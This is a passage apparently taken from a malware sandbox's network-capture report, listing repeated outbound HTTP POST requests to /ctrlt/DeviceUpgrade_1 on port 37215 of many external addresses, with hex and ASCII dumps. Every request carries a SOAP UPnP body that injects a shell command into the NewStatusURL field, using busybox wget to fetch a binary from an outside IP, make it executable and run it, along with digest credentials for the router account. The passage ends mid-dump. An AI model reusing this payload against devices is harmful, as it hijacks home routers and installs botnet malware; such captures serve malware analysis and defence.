20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      139192.168.2.1442398156.109.186.1437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.399918079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.993927002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.697902918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.105781078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.985654116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617477894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:31.880971909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:54.664103031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      140192.168.2.1444052197.32.101.4837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.401587963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.993985891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.697962999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 